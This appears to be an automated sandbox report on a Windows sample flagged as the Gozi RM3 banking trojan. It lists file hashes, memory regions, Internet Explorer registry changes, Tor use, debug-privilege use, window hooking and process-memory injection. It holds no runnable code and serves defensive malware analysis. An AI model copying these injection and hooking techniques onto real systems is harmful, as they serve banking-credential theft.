memory/1404-83-0x0000000002300000-0x0000000002302000-memory.dmp

memory/1404-84-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

memory/1404-85-0x000000000230B000-0x000000000232A000-memory.dmp

memory/1404-86-0x0000000002302000-0x0000000002304000-memory.dmp

memory/1404-87-0x0000000002304000-0x0000000002307000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 625b456ad24406be3c06dce3d5c3432e
SHA1 c7cc8e0c4949ea162d68d6f3e59faedce758d7bf
SHA256 90dabb84166493981c68dee7ee8e96624e4f944dd535cb63f2d982a648cac64e
SHA512 ff3b2c4165ff654727e6e6f3c2c4cbfbc61dfc5c23a1f1f155c1037c088bd07f5ee7a3be75a5867a0c2fb7c328a22a3d950df7e96c0437601533bcde441b92ed

memory/592-90-0x000007FEF2C60000-0x000007FEF37BD000-memory.dmp

memory/592-92-0x0000000002970000-0x0000000002972000-memory.dmp

memory/592-91-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

memory/592-93-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

memory/592-94-0x0000000002972000-0x0000000002974000-memory.dmp

memory/592-95-0x0000000002974000-0x0000000002977000-memory.dmp

memory/592-96-0x000000001B750000-0x000000001BA4F000-memory.dmp

memory/592-97-0x000000000297B000-0x000000000299A000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\osypmjrv.cmdline

MD5 069ff734354afd99b6d5e75d868b1997
SHA1 de903117803306256e72ff697009167ec69cb96f
SHA256 505ede475e1a535e41dab26036a49fb09991de78ce34b157a2f2a486aee4dc93
SHA512 9af3c46dd65f8a4b01aeb3e8b58c462186dbda6020357c594bf535234f9385519aafbcfd796608becc828a4d877049e431379d40b0f48dc35b620849bc742bf0

\??\c:\Users\Admin\AppData\Local\Temp\osypmjrv.0.cs

MD5 7fceb996f934e8bda687cdd2bd46a9a7
SHA1 81e1edbcca6438daaccc3845fa0e3b1a6cff17a6
SHA256 fa53f8174510a9ad008973d47798f022b681e1764a15134efd2004980f23bb6e
SHA512 6aa6253527b72c0605859180887ff19cd96412cb816ec02e832d4a0e0cbcd03d9cc580112e4e2055d4a9ede850c1a339df974371f992b0b9b73e54e137610205

memory/1932-100-0x00000000022F0000-0x00000000022F2000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\CSCA841.tmp

MD5 c12d86f1dc02ea3123cdbee5d780f090
SHA1 993d6216b7d549f301f9c6b322470781c4f3373f
SHA256 31500aed6fdb95d5ad1e36055fd4f6c0afc26126dc4749f132e958b4cf60132c
SHA512 14e5596b519346c1c044576e5b23f59fcc14c239b6e1fe735a6261970b33ac144310a144c9b881c9d8f743d8498de5d30e8a3684eae6bae743f96161b33bf604

C:\Users\Admin\AppData\Local\Temp\RESA842.tmp

MD5 7f1f94f71dcce806d0bca78d612013d2
SHA1 95c33fc2b9e5be4c8ec3e3dc20802652fee94c48
SHA256 956b1c753e9c0028cec53347d7cbf3be5dbd2f4613dcfe6f06c6f860d56ce912
SHA512 e115b20ad57ddae1fb3d357aa83e4f186908832529a936c52f2242965f4edc3bd1c6f2c12ea5055e79836fbd8c8ad19d862752ea8a11738096901a24b44ec8ab

C:\Users\Admin\AppData\Local\Temp\osypmjrv.dll

MD5 ec7a96eefbabd22e6aed087425c95ef6
SHA1 5d32bf83a615701250646bbcb2bef5c8234794ce
SHA256 30578684c26a89bd82378ae4ecc7ce68dd10c7d168f6843e928fdd4d99f35f9f
SHA512 722916ce5825fa8a283413578aef4b0cc110c83f0af42bfc4a40a901e4c399f3b0345dc80833a6eb2a51619e62946604a2e9ba3d5a05670ac8bacaaecc5c0b07

C:\Users\Admin\AppData\Local\Temp\osypmjrv.pdb

MD5 1c01f7d120ec811bebebf853c4c3e1f4
SHA1 d378a6a2b3a070ebaa998f54f5d16f879147e761
SHA256 918cb874e5c417b9a2c237e5dcb6bcfb86f0cb383da6520083a4173fdc93c14a
SHA512 64d79b65aa7178288f570a53e2f3a489fce07b11c645699a995af2d14a8e4254b6224bdf92f9a41a2fbb2e64fbdb3fd44ae1257202ed8f483a819f01e48de6ec

\??\c:\Users\Admin\AppData\Local\Temp\oza3_e8q.cmdline

MD5 ec09b9ded659bf771729da49524ee0e8
SHA1 5da299ddd549cce62f1379e16d8396f6c6c615aa
SHA256 1d36482409f8954a4ad2e52db7a481ce0e119200398ec3337fa0124f6abebdc1
SHA512 665e506e357b1280eb34eee2efd607b7c1bb384b9c988194813b8ab8de5238a52c6b5d46a8126a043d42e2788d12765c50f87f96f931924c24ea79ff77780367

\??\c:\Users\Admin\AppData\Local\Temp\oza3_e8q.0.cs

MD5 697f16b8c6892082559d8a17db343865
SHA1 246d6ba1419478be7915e78b61525da894321fb9
SHA256 518ab091348dea4f49183958185b3d42b5ddb191007bab25b6e69ff6ec923f1f
SHA512 801a428c5dd5ff4a745923914505dcf5a9929b3dbfc5bb5f6320996ad849fa42dc75ac53a432dd01103e0d6db2269583351f14b189a76a066d6f940ff79d38d6

C:\Users\Admin\AppData\Local\Temp\oza3_e8q.pdb

MD5 34db741e5006a94367bc64b11110b0f5
SHA1 a051a45c59d0e033b0d3d6c911d74832cfc17989
SHA256 c50abb56dace7b907031f52db2053a339fa4ab8ac2c84e8aaa03728d66af641a
SHA512 d5027b156a3fed8ff20bc6ad1aa90d5319341d35f440c4d3ae4be3746c3368a1caba53bccd5e72fa7d1126e80e5a2092ec9f9b5ba4a34d2825c43aa8c414a39b

C:\Users\Admin\AppData\Local\Temp\oza3_e8q.dll

MD5 9120556a97a45e7555ebda26a4891e04
SHA1 8d55a8b570407ac13120a661213e3de898df0c22
SHA256 bb1dead640c14f03c904f43a2ac1520f5c8e214508ca3d70c7e7daf46b52765d
SHA512 f642e1a7599a926b6c3e98b632c140f4ada33149975617470e270aeefb7d32d866aa3d80ceb290824a093a1d647ae154d97a426b767157c162b76e550629c5a4

memory/1912-109-0x0000000002910000-0x0000000002923000-memory.dmp

memory/1264-110-0x0000000002AD0000-0x0000000002AE5000-memory.dmp

memory/1264-633-0x0000000002640000-0x0000000002655000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-15 14:05

Reported

2022-03-15 14:08

Platform

win10v2004-20220310-en

Max time kernel

144s

Max time network

150s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi RM3

banker trojan gozi_rm3

Uses Tor communications

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1239828497" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000cb9dac30eec32464c0c795d63a23a16a1f39e144fbdfd93c39f7732b99cbf3aa000000000e800000000200002000000017dddd0f48c0769f3af9c8afc1933554d96d0346db91e42a44737c75fe3f542f20000000b48ad91c8255229396dbf7f273ecc5e0f72491b5443edf66ec76ad2da20d50c0400000000081386f7dcacf39169071cb38b5d3ab2467633e70bf52fdd268946068c8e5d7e95881abd27e51502f2dbddb2a7e47da4167b7481cc11f835870af9a6be6fb62 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 6045ab4b7e38d801 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff680000001a000000ee0400007f020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000b5c2719d4402ce19a3c4d452d5fccb19a0b03547e8feee6c5e6129a97e614e0e000000000e80000000020000200000008369f785becf77e598de1a37e13b4a4a80e4dd5b637d255b6161812a43cc5edbc00000008a77f1996ea9713fe2ed530c7f5b4b79c54661a7c0227c7a164aee7345f67141fe052f15ad9f88d41df43afb8cdc708ee48036454d6d6a0295b83481df3413b34854e222f07af81c67a43ea9bc0da339dd2073755ab497a5c6768d23005dbf0971126f2d2d181cd637d7515d292b9d231f1e6a8c19260ed987db803da22cad8fc688aefa1cc4a4c0cf70fe540e8957e0b8aa37c6bda198fa111c85882cec9dc72ca66bd889b112d7e0e9ff4ae91cfd51752c6895f70c4554fa169bb9daf47c594000000072819e8bbcc6d8ef74d9597b96483136d18805911ec89797187e437e6d11cc2c151cde2cd7451f30a3b2ff7ab0e0600261950c8b4a317f23917d456d19251d40 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000278caae0289e07c01b55643235c1d17beaeb3ab3d647899a701ab368f4fc55ab000000000e8000000002000020000000a2d3534366cce6f8672509bfba1f9ee9bb14e88b07634f095528a360edd2612dc00000008d6a839b7fed1b295b23e575b9e43709cc50b29730c23502934b041d3f0946aaa37da38ed0f6b71acb6ddb16bfe42924bc0ac0702e43506a8ff1434f7e2b02cd22f49a27be4a9c303a4c00efe8ada9f1c75e7bb72c813656732c80f6f94e906822985cedfcc87c54baeb716905f8530d3b26575d820289fb111ae5af2950d07dc6623d543a1402cfa9e161f33705e5363643c0641ffa37192bf42358bcbde66ddd36be45da10ac558162b36dade161bd836faea5b27848929e8d053527fefc3e40000000452d3778d033f935497627f85519250b739e3a85435e414fb8538d98edda21a3da3c4534abd687529c3a5dd292af78a1f5b10d4400c838f131716b41734ad03b C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff1a0000001a000000a00400007f020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1239828497" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b60000000002000000000010660000000100002000000097e9b3339d74b1b2a27394b9c04c68d9810549ea073ce400c1f26a70e483e573000000000e8000000002000020000000409ff2d119d14706fc8fc056cb00bfa9e02b1bdd8a1517571630130ea5bdfb0cc00000008b4dcc2d11885473e4f49787e893a372e9c7a4abf0e9c60613f666ce0aab891313301ba40607038fbba24b47e5422318c999ed6e71640f4c135eef439210882f49c0e410c69da73b824ce8081cd663d4eddcc1a0c0aa412bb0836b84a32928512e62433bf3a7bc398acdd570439456027212457de566fd1a437185dfd36076058884f88aca112a2c9796d31a06625045d478e22ecab29e7a7297d2d9011c210670361c61ad7db5fc7750f4ef655fac1c15cb064b7d71a9d3c98ff1cd2c149bcb4000000019ffb369db768ad67f79d3810f72a208f396cfd95cc76c895eca24eaf9da917edcfce43a8f03e4fb76479bb65dcf0dc16b06643c3ae51f1c030a7252e26c565d C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30947454" C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4440 wrote to memory of 3632 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 3632 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 3632 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2752 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2752 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 2752 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4492 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4492 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4492 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4992 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 4440 wrote to memory of 4992 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
